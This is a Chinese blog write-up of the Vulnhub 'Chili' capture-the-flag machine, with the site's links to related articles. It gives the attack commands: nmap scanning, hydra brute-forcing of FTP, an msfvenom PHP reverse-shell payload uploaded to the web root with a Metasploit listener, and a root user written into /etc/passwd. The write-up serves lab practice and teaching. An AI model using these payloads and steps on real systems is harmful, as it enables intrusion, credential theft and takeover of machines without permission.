Vulnhub---chili

最新推荐文章于 2022-04-02 00:21:09 发布
最新推荐文章于 2022-04-02 00:21:09 发布
阅读量396 收藏 7
点赞数 3
分类专栏: 渗透测试 文章标签: shell linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56123950/article/details/117755878
版权

Vulnhub—chili

靶机下载地址:http://www.vulnhub.com/entry/chili-1,558/

信息收集

扫描网段
nmap -sP 172.16.58.0/24

在这里插入图片描述

扫描端口信息及版本信息
nmap -p- 172.16.58.137
nmap -sV 172.16.58.137

在这里插入图片描述

访问网站

在这里插入图片描述
这里我们访问网页源代码,捕捉到了有用的信息
在这里插入图片描述
我们使用cewl工具对网页信息进行爬取并保存到文件中,并将文件中的信息大小写复写,以此作为用户名字典

cewl http://192.168.200.130 > user1.txt

然后通过九头蛇工具暴力破解ftp
在这里插入图片描述
破解成功,用户名为:chili 密码为:a1b2c3d4
在这里插入图片描述
然后我们登陆ftp
在这里插入图片描述
发现我们可以访问网站根目录,查看文件,发现我们对.nano文件具有读写执行权限,我们可以写入一个后门
在这里插入图片描述

利用漏洞

生成木马
msfvenom -p php/meterpreter_reverse_tcp LHOST=172.16.58.129 LPORT=4444 -f raw  > shell1.php

在这里插入图片描述

上传文件

然后我们直接将木马上传到服务器的.nano目录下,使用put命令上传,并给予777的权限
在这里插入图片描述
在这里插入图片描述

msf反弹shell

然后我们通过msf反弹shell,在kali端口开启监听
在这里插入图片描述

use exploit/multi/handler
set payload php/meterpreter_reverse_tcp 
 set lhost 192.168.179.145 
run

在这里插入图片描述
然后浏览器访问我们的木马
在这里插入图片描述

提权

成功拿到靶机的webshell,但是权限不高,我们得进行提权
在这里插入图片描述
这里会用到一个工具 enumy64:是一款linux后渗透提权枚举工具,是一个快速的可移植、可执行文件
下载地址:https://github.com/luke-goddard/enumy/releases
直接下载enumy64然后放到kali里即可
然后我们将这个文件上传到靶机上并给予权限
在这里插入图片描述
在这里插入图片描述

执行脚本

在这里插入图片描述
得到信息
在这里插入图片描述
通过以上信息,我们发现我们对/etc/passwd文件有写的权限,这里我们可以直接写入一个高权限用户,然后进行登录。
首先通过perl语言生成test用户的密码密文
在这里插入图片描述
将自己构造的用户写入/etc/passwd下

echo "test:teH0wLIpW0gyQ:0:0:root:/root:/bin/bash" > /etc/passwd

在这里插入图片描述

切换用户

切换test用户后就可以找到我们的flag
在这里插入图片描述

从不专注的人
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
VulnHub靶场系列:Chili
快吃小蛋糕吧的博客
10-05 1349
VulnHub靶场系列:Chili 刚刚在VulnHub官网上找了些简单的靶机,感觉这个还挺适合新手的 环境部署: https://download.vulnhub.com/chili/Chili.ova 实战: 首先使用工具扫描靶机所在网段,得到靶机IP: root@kali:/# nmap -sP 192.168.200.129/24 Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-05 08:56 CST Nmap scan report f
Pwned Vulnhub
logan_logan的博客
12-19 243
在浏览器输入地址打开网页 端口扫描 发现仅仅就开了三个端口; 目录枚举 使用gobuster工具发现了几个目录,接下来进行探测; gobuster dir -u http://10.36.201.103/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 3.1发现hidden_text目录下存在一个secret.dic文件,打开之后都是一些目录,下载下来之后使用gobuster工具进行枚举; gobuster..
vulnhubChili 靶机
Nicky_Zheng的博客
01-29 733
1、信息收集 1.1、端口扫描 已通过netdiscover发现靶机 ip:192.168.57.142 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-25 17:11 CST Nmap scan report for 192.168.57.142 Host
VulnHub渗透测试实战靶场 - CHILI:1
LYJ20010728的博客
08-20 1163
VulnHub渗透测试实战靶场 - CHILI:1环境下载Tomato:1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 Tomato:1靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l 得到目标靶机的IP为:192.168.246.138 使用 nmap 扫描开放的端口:sudo nmap -sC -sV -p 1-65
教你怎么用Vulnhub来搭建环境
热门推荐
大方子
09-22 2万+
0x01 前言 Vulnhub它是一个提供各种漏洞环境的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。 如果只是练习一些常见的漏洞可以看我另外两篇用Docker来搭建各种漏洞靶场(妈妈再也不用担心我没有靶场练习了)从CentOS安装Docker来搭建漏洞靶场到Joomla 3.4.5 反序列化漏洞复现(附批量Getshell脚本) 0x02 下载 https:/...
VulnHub靶场之CHILI: 1
A_dmin的博客
12-02 837
VulnHub靶场之CHILI: 1 扫描IP以及端口: 访问80端口,一个小辣椒,目录扫描,啥都没有,只能从ftp下手了: 看了看hint,用chili当作用户名试试破解一下密码: 利用hydra破解ftp密码: hydra -l chili -P /usr/share/wordlists/rockyou.txt -f -V ftp://192.168.198.150 得到密码: 成功进入: 进入到/var/www/html下,.nano下可读可写: 上传shell文件,别忘了加权限chmo
靶机渗透测试(Chili
@小张小张的博客
09-25 1622
靶机渗透测试(Chili): Vulnhub靶机 Chili 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。 靶机难度:(Easy) 目标:Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root). 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 得到靶机ip地址为:192.168.10.88 2. nmap进行
chili-cookoff
05-02
5. **版本控制**:项目名称以"chili-cookoff-master"结尾,暗示它可能来自GitHub,其中"master"是主分支,表明项目使用Git进行版本控制。版本控制对于协作开发和代码管理至关重要。 6. **测试**:虽然描述中没有...
skansk-chili
04-11
斯堪斯克辣椒 构建设置 # install dependencies $ npm install # serve with hot reload at localhost:3000 $ npm run dev # build for production and launch server $ npm run build $ npm run start ...
chili-sensor
04-01
入门 正在安装 您可能需要 跑步 使用以下内容创建/arduino_secrets.h # define SECRET_SSID " your network name " # define SECRET_PASS " your password
enumy:Linux后利用特权升级枚举
03-19
枚举 Enumy是一种超快速的可移植可执行文件,您可以在后期开发阶段的渗透测试或CTF期间将其放在目标Linux机器上。运行枚举将枚举常见安全漏洞的框。 安装 您可以从发行版x86或x64选项卡下载最终的二进制文件。静态链接到musl将最终的枚举二进制文件传输到目标计算机。 ./enumy 谁应该使用Enumy Pentester可以在目标计算机可报告的问题上运行。 CTF玩家可以使用它来识别他们可能错过的事物。 谁想知道在本地计算机上发现了多少枚举枚举的人? 选项 $ ./enumy64 -h ▄█▀─▄▄▄▄▄▄▄─▀█▄ _____ ▀█████████████▀ | __ | ___ _ _ _____ _ _ █▄███▄█ | __ | | | | | | |
enumy:用于从字符串数组制作枚举的微型 npm 模块
06-25
枚举 一个用于创建基本枚举的小型 npm 模块。 用法 var enumy = require ( 'enumy' ) ; var Planets = enumy ( 'PLANET_MERCURY' , 'PLANET_VENUS' , 'PLANET_EARTH' , 'PLANET_MARS' , 'PLANET_JUPITER' , 'PLANET_SATURN' , 'PLANET_URANUS' , 'PLANET_NEPTUNE' ) ; console . log ( Planets . PLANET_MERCURY ) ; // #=> 'PLANET_MERCURY' 一种常见的模式是将枚举作为模块公开。 为此,只需添加: module . exports = Planets 到上面的文件,然后你
maroon1-chili
03-08
:sparkles: 方芒果 :sparkles: 这是一个使用Git作为的网站。 它是在不到一分钟的时间内使用创建的。 您可以像这样,或探索一些变体。 如何不同: :artist_palette: 看 :pencil: 内容管理系统 ...
vulnhubchili
鲨鱼辣椒的博客
06-08 266
信息搜集 扫描网段 扫描
enum枚举类的基本知识及使用技巧
醉瑾_的博客
04-02 5520
1、前置知识 1、枚举类是一个特殊的类,,它一样有自己的成员变量、方法,可以实现一个或多个接口,也可以定义自己的构造器。 2、一个 java 源文件最多只能定义一个 public 访问权限的 枚举类。且该 java 源文件也必须和该枚举的类名相同 3、枚举类默认继承了 java.lang.Enum 类,而不是 Object 类,所以枚举类不能显示继承其他父类。其中 java.lang.Enum 类实现了 java.lang.Serializable 和 java.lang.Comparable 两个接口。
Pikachu---SQL注入
从不专注的人的博客
07-05 2264
概述 什么是SQL注入漏洞 注入(SQLi)是一种注入攻击,可以执行恶意SQL语句。它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器。攻击者可以使用SQL注入漏洞绕过应用程序安全措施;可以绕过网页或Web应用程序的身份验证和授权,并检索整个SQL数据库的内容;还可以使用SQL注入来添加,修改和删除数据库中的记录。 SQL注入漏洞可能会影响使用SQL数据库(如MySQL,Oracle,SQL Server或其他)的任何网站或Web应用程序。犯罪分子可能会利用它来未经授
PHP-CGI远程代码执行漏洞CVE-2012-1823复现
从不专注的人的博客
06-17 925
目录CVE-2012-1823漏洞原因影响版本漏洞利用cgi模式下的参数开启实验环境访问网站制造漏洞执行代码移除漏洞环境 CVE-2012-1823 漏洞原因 用户请求的querystring被作为了php-cgi的参数执行了,命令行参数不仅可以通过#!/usr/local/bin/php-cgi -d include_path=/path的方式传入php-cgi,还可以通过querystring的方式传入。 影响版本 < php-5.3.12 or php < 5.4.2 mod方式、fpm方
PHP--远程命令执行漏洞CVE-2018-19518复现
从不专注的人的博客
06-28 581
目录漏洞介绍漏洞复现进入容器移除环境 漏洞介绍 -php imap扩展用户在php中执行邮件收发操作,其imap_open函数会调用rsh来连接远程shell,而debianh/Ubuntu中默认使用ssh来代替rsh功能,也就是说debian系列系统中,执行rsh命令实际执行的是ssh命令。 -debian系列系统有Ubuntu、kali、MX linux、AntiX、PureOS等。 -ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者可以通过注入这个参数,最终将导致命令执行
Vulnhub---Gigachad
从不专注的人的博客
06-02 537
Vulnhub—Gigachad 实验准备 如果使用VMware的话,在运行靶机之前需要进行一下联网设置,修改网卡重新获取ip,不然无法联网 靶场下载地址:http://www.vulnhub.com/entry/gigachad-1,657/ 信息收集 扫描目标网段 nmap -sP 172.16.58.0/24 ...
xxl-job拒绝访问
最新发布
09-02
- *1* *2* [xxl-job服务端启动流程简记](https://blog.csdn.net/shark_chili3007/article/details/123343614)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值